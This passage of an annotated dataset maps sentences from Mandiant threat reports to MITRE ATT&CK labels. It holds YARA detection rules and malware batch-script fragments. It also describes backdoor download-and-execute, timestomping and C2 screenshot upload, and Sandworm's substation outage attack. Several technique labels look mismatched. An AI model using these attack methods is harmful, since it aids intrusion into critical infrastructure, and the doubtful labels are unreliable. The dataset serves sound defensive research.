8.8.8.8}}>>%t% @ping 8.8.8.8>>%t% @echo {{ping gitlab.com}}>>%t% @ping gitlab.com>>%t%", "sentence_text": "@echo {{ping mail.google.com}}>>%t% @ping mail.google.com>>%t% @echo {{ping google.com}}>>%t% @ping google.com>>%t% @echo {{ping mf.local}}>>%t% @ping mf.local>>%t% @echo {{DATE-TIME}}>>%t% @date /T>>%t%", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s186-5cd63b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 186, "context_before": "@echo {{ping mail.google.com}}>>%t% @ping mail.google.com>>%t% @echo {{ping google.com}}>>%t% @ping google.com>>%t% @echo {{ping mf.local}}>>%t% @ping mf.local>>%t% @echo {{DATE-TIME}}>>%t% @date /T>>%t%", "sentence_text": "@time /T>>%t%", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s187-6f25d7", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 187, "context_before": "@time /T>>%t%", "sentence_text": "@echo {{END}}>>%t% @del /q /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s188-770d25", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 188, "context_before": "@echo {{END}}>>%t% @del /q /f", "sentence_text": "%f% @more<%t%>%f% @del /q /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s189-1e32eb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 189, "context_before": "%f% @more<%t%>%f% @del /q /f", "sentence_text": "%t% @exit MITRE ATT&CK Techniques Yara Rules rule M_Disrupt_ROADSWEEP_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s190-5334a5", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 190, "context_before": "%t% @exit MITRE ATT&CK Techniques Yara Rules rule M_Disrupt_ROADSWEEP_1 { meta:", "sentence_text": "author = \"Mandiant\" description = \"Identifies the encryption key used within ROADSWEEP\" strings:\n$ = {C6 45 D5 E4 C6 45 D6 B1 C6 45 D7 6B C6 45 D8 22 C6 45 D9 B5 C6 45 DA 88 C6 45 DB 94 C6 45 DC AA C6 45 DD 86 C6 45 DE C4 C6 45 DF 21 C6 45 E0 E8 C6 45 E1 75 C6 45 E2 9D C6 45 E3 F3 C7 44 24 10 00 00 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s191-32ec71", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 191, "context_before": "author = \"Mandiant\" description = \"Identifies the encryption key used within ROADSWEEP\" strings:\n$ = {C6 45 D5 E4 C6 45 D6 B1 C6 45 D7 6B C6 45 D8 22 C6 45 D9 B5 C6 45 DA 88 C6 45 DB 94 C6 45 DC AA C6 45 DD 86 C6 45 DE C4 C6 45 DF 21 C6 45 E0 E8 C6 45 E1 75 C6 45 E2 9D C6 45 E3 F3 C7 44 24 10 00 00 00", "sentence_text": "F0} condition:\nall of them } rule M_Disrupt_ZEROCLEAR_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s192-3060f2", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 192, "context_before": "F0} condition:\nall of them } rule M_Disrupt_ZEROCLEAR_1 { meta:", "sentence_text": "author = \"Mandiant\" description = \"Identifies code sequences in ZEROCLEAR\" strings:\n$ = \"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\" wide $ = \"wp starts!\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s195-1b192a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 195, "context_before": "$ = \"in start!\"", "sentence_text": "condition:\nall of them } rule M_Backdoor_CHIMNEYSWEEP_1 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s196-13736c", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 196, "context_before": "condition:\nall of them } rule M_Backdoor_CHIMNEYSWEEP_1 {", "sentence_text": "meta:\nauthor = \"Mandiant\" description = \"Detects strings found in CHIMNEYSWEEP\" strings:\n$ = \"%sAPPX.%x%x%x%x%x.tmp\" $ = \"rerunadmn\" $ = \"runupdate\" $ = \"runupdateok\" $ = \"baserun\" $ = \"heyirunadmn\" $ = \"subttoadmn\" $ = \"ttrundll\" $ = \"{\\\"ok\\\":false,\" $ = \"TL_%s-%s\" $ = \"|**|Net1NOFILE|**|\" $ = \"%s:---:%s-%s:---:%s:---:www:---:MNEW\" condition:\nuint16(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s197-e43b99", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 197, "context_before": "meta:\nauthor = \"Mandiant\" description = \"Detects strings found in CHIMNEYSWEEP\" strings:\n$ = \"%sAPPX.%x%x%x%x%x.tmp\" $ = \"rerunadmn\" $ = \"runupdate\" $ = \"runupdateok\" $ = \"baserun\" $ = \"heyirunadmn\" $ = \"subttoadmn\" $ = \"ttrundll\" $ = \"{\\\"ok\\\":false,\" $ = \"TL_%s-%s\" $ = \"|**|Net1NOFILE|**|\" $ = \"%s:---:%s-%s:---:%s:---:www:---:MNEW\" condition:\nuint16(0)", "sentence_text": "== 0x5A4D and 8 of them } import \"pe\" rule M_Backdoor_CHIMNEYSWEEP_2 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s198-49d5ff", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 198, "context_before": "== 0x5A4D and 8 of them } import \"pe\" rule M_Backdoor_CHIMNEYSWEEP_2 { meta:", "sentence_text": "author = \"Mandiant\" description = \"Detects encrypted data found in CHIMNEYSWEEP\" strings:\n$key = {C6 45 D5 E4 C6 45 D6 B1 C6 45 D7 6B C6 45 D8 22 C6 45 D9 B5 C6 45 DA 88 C6 45 DB 94 C6 45 DC AA C6 45 DD 86 C6 45 DE C4 C6 45 DF 21 C6 45 E0 E8 C6 45 E1 75 C6 45 E2 9D C6 45 E3 F3 C7 44 24 10 00 00 00 F0} $encoded_config = {FA c0 c7 e5} $encoded_bot = {AE E0 ED D6} condition:\nuint16(0) == 0x5A4D and all of them and (pe.exports(\"RatingSetupUI\") or pe.exports(\"A\"))\n}\nPosted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s199-03bea3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 199, "context_before": "author = \"Mandiant\" description = \"Detects encrypted data found in CHIMNEYSWEEP\" strings:\n$key = {C6 45 D5 E4 C6 45 D6 B1 C6 45 D7 6B C6 45 D8 22 C6 45 D9 B5 C6 45 DA 88 C6 45 DB 94 C6 45 DC AA C6 45 DD 86 C6 45 DE C4 C6 45 DF 21 C6 45 E0 E8 C6 45 E1 75 C6 45 E2 9D C6 45 E3 F3 C7 44 24 10 00 00 00 F0} $encoded_config = {FA c0 c7 e5} $encoded_bot = {AE E0 ED D6} condition:\nuint16(0) == 0x5A4D and all of them and (pe.exports(\"RatingSetupUI\") or pe.exports(\"A\"))\n}\nPosted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant •", "sentence_text": "39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s200-e6cb7f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 200, "context_before": "39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n1 | Perform file collection 40 | File collection config 2 |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s201-97f5d9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 201, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n1 | Perform file collection 40 | File collection config 2 |", "sentence_text": "Update the core backdoor | RC4 encrypted executable, which is written to the disk, time stomped to be between 2010-2021, then executed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "written to the disk, time stomped, then executed", "entities": [ { "text": "core backdoor", "start": 11, "end": 24, "label": "MalwareTool" }, { "text": "written to the disk", "start": 62, "end": 81, "label": "Action" }, { "text": "time stomped to be between 2010-2021", "start": 83, "end": 119, "label": "Action" }, { "text": "then executed", "start": 121, "end": 134, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s202-80ba2a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 202, "context_before": "Update the core backdoor | RC4 encrypted executable, which is written to the disk, time stomped to be between 2010-2021, then executed.", "sentence_text": "If this mutex exists, the backdoor instance who requested the update is terminated.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1480.001", "name": "Environmental Keying" } ], "procedure": "Terminates existing instance when update mutex is detected", "entities": [ { "text": "backdoor", "start": 26, "end": 34, "label": "MalwareTool" }, { "text": "mutex exists", "start": 8, "end": 20, "label": "Action" }, { "text": "terminated.", "start": 72, "end": 83, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s203-8cbd1e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 203, "context_before": "If this mutex exists, the backdoor instance who requested the update is terminated.", "sentence_text": "20 | Download and execute a file | RC4 encrypted data which is written to disk, then executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads and executes RC4 encrypted files", "entities": [ { "text": "Download and execute a file", "start": 5, "end": 32, "label": "Action" }, { "text": "RC4 encrypted data", "start": 35, "end": 53, "label": "Action" }, { "text": "written to disk", "start": 63, "end": 78, "label": "Action" }, { "text": "executed.", "start": 85, "end": 94, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s204-a031e9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 204, "context_before": "20 | Download and execute a file | RC4 encrypted data which is written to disk, then executed.", "sentence_text": "200 | Update screenshot settings and upload a screenshot | Takes a screenshot using either the b.j file from the covert store or the Windows APIs, store the screenshot on disk then upload to the C2.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Captures and exfiltrates screenshots with configurable settings", "entities": [ { "text": "Update screenshot settings", "start": 6, "end": 32, "label": "Action" }, { "text": "upload a screenshot", "start": 37, "end": 56, "label": "Action" }, { "text": "Takes a screenshot", "start": 59, "end": 77, "label": "Action" }, { "text": "store the screenshot on disk ", "start": 147, "end": 176, "label": "Action" }, { "text": "upload to the C2.", "start": 181, "end": 198, "label": "Action" }, { "text": "covert store", "start": 113, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "Windows APIs", "start": 133, "end": 145, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s205-71a7be", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 205, "context_before": "200 | Update screenshot settings and upload a screenshot | Takes a screenshot using either the b.j file from the covert store or the Windows APIs, store the screenshot on disk then upload to the C2.", "sentence_text": "T1007 | System Service Discovery T1033 | System Owner/User Discovery T1057", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s206-b984fd", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 206, "context_before": "T1007 | System Service Discovery T1033 | System Owner/User Discovery T1057", "sentence_text": "| Process Discovery T1082 | System Information Discovery T1083 | File and Directory Discovery T1087 | Account Discovery T1518 | Software Discovery", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s1-3b9a9f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "In late 2022, Mandiant responded to a disruptive cyber physical incident in which the Russia-linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Targets critical infrastructure organizations", "entities": [ { "text": "Russia-linked threat actor Sandworm", "start": 86, "end": 121, "label": "ThreatActor" }, { "text": "Ukrainian critical infrastructure organization.", "start": 133, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s2-b188e5", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "In late 2022, Mandiant responded to a disruptive cyber physical incident in which the Russia-linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization.", "sentence_text": "This incident was a multi-event cyber attack that leveraged a novel technique for impacting industrial control systems (ICS) / operational technology (OT).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565", "name": "Data Manipulation" } ], "procedure": "Leverages novel technique for ICS/OT impact", "entities": [ { "text": "multi-event cyber attack", "start": 20, "end": 44, "label": "Action" }, { "text": "novel technique for impacting industrial control systems (ICS) / operational technology (OT)", "start": 62, "end": 154, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s3-3d6424", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "This incident was a multi-event cyber attack that leveraged a novel technique for impacting industrial control systems (ICS) / operational technology (OT).", "sentence_text": "The actor first used OT-level living off the land (LotL) techniques to likely trip the victim’s substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Uses OT living off the land techniques to trip substation circuit breakers", "entities": [ { "text": "actor", "start": 4, "end": 9, "label": "ThreatActor" }, { "text": "OT-level living off the land (LotL) techniques", "start": 21, "end": 67, "label": "Action" }, { "text": "trip the victim’s substation circuit breakers", "start": 78, "end": 123, "label": "Action" }, { "text": " causing an unplanned power outage", "start": 124, "end": 158, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s4-db659e", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "The actor first used OT-level living off the land (LotL) techniques to likely trip the victim’s substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine.", "sentence_text": "Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim’s IT environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys new variant of CADDYWIPER wiper malware", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 81, "end": 91, "label": "MalwareTool" }, { "text": "conducted a second disruptive event", "start": 15, "end": 50, "label": "Action" }, { "text": "deploying a new varian", "start": 54, "end": 76, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s5-c1f929", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim’s IT environment.", "sentence_text": "This attack represents the latest evolution in Russia’s cyber physical attack capability, which has been increasingly visible since Russia’s invasion of Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s6-ff2c21", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "This attack represents the latest evolution in Russia’s cyber physical attack capability, which has been increasingly visible since Russia’s invasion of Ukraine.", "sentence_text": "By using LotL techniques, the actor likely decreased the time and resources required to conduct its cyber physical attack.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Employs living off the land techniques for efficiency", "entities": [ { "text": "actor", "start": 30, "end": 35, "label": "ThreatActor" }, { "text": "using LotL techniques", "start": 3, "end": 24, "label": "Action" }, { "text": "decreased the time and resources required", "start": 43, "end": 84, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s7-fd181d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "By using LotL techniques, the actor likely decreased the time and resources required to conduct its cyber physical attack.", "sentence_text": "While Mandiant was unable to determine the initial intrusion point, our analysis suggests the OT component of this attack may have been developed in as little as two months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s8-5c7f06", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "While Mandiant was unable to determine the initial intrusion point, our analysis suggests the OT component of this attack may have been developed in as little as two months.", "sentence_text": "This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers (OEMs) leveraged across the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s9-87bb38", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers (OEMs) leveraged across the world.", "sentence_text": "We initially tracked this activity as UNC3810 before merging the cluster with Sandworm.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Tracks and attributes threat activity to Sandworm actor", "entities": [ { "text": "Sandworm.", "start": 78, "end": 87, "label": "ThreatActor" }, { "text": "UNC3810", "start": 38, "end": 45, "label": "ThreatActor" } ] }, { "uid": "mitre-97_mitre_report-p1-s10-4a8ad8", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "We initially tracked this activity as UNC3810 before merging the cluster with Sandworm.", "sentence_text": "Sandworm is a full-spectrum threat actor that has carried out espionage, influence and attack operations in support of Russia's Main Intelligence Directorate (GRU) since at least 2009.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Conducts espionage, influence, and attack operations for GRU", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "Russia's Main Intelligence Directorate (GRU) ", "start": 119, "end": 164, "label": "ThreatActor" } ] }, { "uid": "mitre-97_mitre_report-p1-s11-f2347f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Sandworm is a full-spectrum threat actor that has carried out espionage, influence and attack operations in support of Russia's Main Intelligence Directorate (GRU) since at least 2009.", "sentence_text": "Beyond Ukraine, the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military's far-reaching ambitions and interests in other regions.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1597", "name": "Search Closed Sources" } ], "procedure": "Sustains global espionage operations", "entities": [ { "text": "group", "start": 20, "end": 25, "label": "ThreatActor" }, { "text": "sustain espionage operations", "start": 39, "end": 67, "label": "Action" }, { "text": "global in scope", "start": 77, "end": 92, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s12-1e7f58", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Beyond Ukraine, the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military's far-reaching ambitions and interests in other regions.", "sentence_text": "Government indictments have linked the group to the Main Center for Special Technologies (also known as GTsST and Military Unit 74455).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates under GRU's Main Center for Special Technologies", "entities": [ { "text": "group", "start": 39, "end": 44, "label": "ThreatActor" }, { "text": "Main Center for Special Technologies ", "start": 52, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "GTsST", "start": 104, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "Military Unit 74455", "start": 114, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s13-8c4bc5", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Government indictments have linked the group to the Main Center for Special Technologies (also known as GTsST and Military Unit 74455).", "sentence_text": "Given Sandworm’s global threat activity and novel OT capabilties, we urge OT asset owners to take action to mitigate this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s14-f1e64d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Given Sandworm’s global threat activity and novel OT capabilties, we urge OT asset owners to take action to mitigate this threat.", "sentence_text": "If you need support responding to related activity, please contact .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s15-7b1fc5", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "If you need support responding to related activity, please contact .", "sentence_text": "While we were unable to identify the initial access vector into the IT environment, Sandworm gained access to the OT environment through a hypervisor that hosted a supervisory control and data acquisition (SCADA) management instance for the victim’s substation environment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Gains OT access via hypervisor hosting SCADA management instance", "entities": [ { "text": "Sandworm", "start": 84, "end": 92, "label": "ThreatActor" }, { "text": "gained access to the OT environment", "start": 93, "end": 128, "label": "Action" }, { "text": "hypervisor", "start": 139, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "supervisory control and data acquisition (SCADA)", "start": 164, "end": 212, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s16-8a256d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "While we were unable to identify the initial access vector into the IT environment, Sandworm gained access to the OT environment through a hypervisor that hosted a supervisory control and data acquisition (SCADA) management instance for the victim’s substation environment.", "sentence_text": "Based on evidence of lateral movement, the attacker potentially had access to the SCADA system for up to three months.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Maintains persistent access to SCADA system for months", "entities": [ { "text": "attacker", "start": 43, "end": 51, "label": "ThreatActor" }, { "text": "lateral movement", "start": 21, "end": 37, "label": "Action" }, { "text": "had access to the SCADA system for up to three months.", "start": 64, "end": 118, "label": "Action" }, { "text": "SCADA system", "start": 82, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s17-8abf1d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Based on evidence of lateral movement, the attacker potentially had access to the SCADA system for up to three months.", "sentence_text": "On October 10, the actor leveraged an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary in a likely attempt to execute malicious control commands to switch off substations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1559.002", "name": "Dynamic Data Exchange" } ], "procedure": "Executes MicroSCADA binary via ISO image to disrupt substations", "entities": [ { "text": "actor", "start": 19, "end": 24, "label": "ThreatActor" }, { "text": "leveraged an optical disc (ISO) image", "start": 25, "end": 62, "label": "Action" }, { "text": "execute a native MicroSCADA binary", "start": 80, "end": 114, "label": "Action" }, { "text": "execute malicious control commands", "start": 138, "end": 172, "label": "Action" }, { "text": "switch off substations.", "start": 176, "end": 199, "label": "Action" }, { "text": "a.iso", "start": 70, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "MicroSCADA", "start": 97, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s18-eb66ab", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "On October 10, the actor leveraged an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary in a likely attempt to execute malicious control commands to switch off substations.", "sentence_text": "The ISO file contained at least the following:\n“lun.vbs”, which runs n.bat “n.bat”, which likely runs the native scilc.exe utility “s1.txt”, which likely contains the unauthorized MicroSCADA commands Based on a September 23 timestamp of “lun.vbs”, there was potentially a two-month time period from when the attacker gained initial access to the SCADA system to when they developed the OT capability.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Deploys ISO with VBS, batch file, and SCADA commands for OT impact", "entities": [ { "text": "ISO file", "start": 4, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "lun.vbs", "start": 48, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "n.bat", "start": 76, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "scilc.exe", "start": 113, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "s1.txt", "start": 132, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "runs n.bat", "start": 64, "end": 74, "label": "Action" }, { "text": "runs the native scilc.exe utility", "start": 97, "end": 130, "label": "Action" }, { "text": "contains the unauthorized MicroSCADA commands", "start": 154, "end": 199, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s19-0c01a3", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The ISO file contained at least the following:\n“lun.vbs”, which runs n.bat “n.bat”, which likely runs the native scilc.exe utility “s1.txt”, which likely contains the unauthorized MicroSCADA commands Based on a September 23 timestamp of “lun.vbs”, there was potentially a two-month time period from when the attacker gained initial access to the SCADA system to when they developed the OT capability.", "sentence_text": "Although we were not able to fully recover the ICS command execution implemented by the binary, we are aware that the attack resulted in an unscheduled power outage.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Causes unscheduled power outage via ICS command execution", "entities": [ { "text": "ICS command execution", "start": 47, "end": 68, "label": "Action" }, { "text": "attack resulted in an unscheduled power outage.", "start": 118, "end": 165, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s20-701ace", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Although we were not able to fully recover the ICS command execution implemented by the binary, we are aware that the attack resulted in an unscheduled power outage.", "sentence_text": "Two days after the OT event, Sandworm deployed a new variant of CADDYWIPER in the victim’s IT environment to cause further disruption and potentially to remove forensic artifacts.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys new CADDYWIPER variant for disruption and forensic cleanup", "entities": [ { "text": "Sandworm", "start": 29, "end": 37, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 64, "end": 74, "label": "MalwareTool" }, { "text": "deployed a new variant", "start": 38, "end": 60, "label": "Action" }, { "text": "cause further disruption", "start": 109, "end": 133, "label": "Action" }, { "text": "remove forensic artifacts.", "start": 153, "end": 179, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s21-3422c8", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Two days after the OT event, Sandworm deployed a new variant of CADDYWIPER in the victim’s IT environment to cause further disruption and potentially to remove forensic artifacts.", "sentence_text": "However, we note that the wiper deployment was limited to the victim’s IT environment and did not impact the hypervisor or the SCADA virtual machine.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Limits wiper deployment to IT environment, preserves OT access", "entities": [ { "text": "wiper deployment was limited to the victim’s IT environment", "start": 26, "end": 85, "label": "Action" }, { 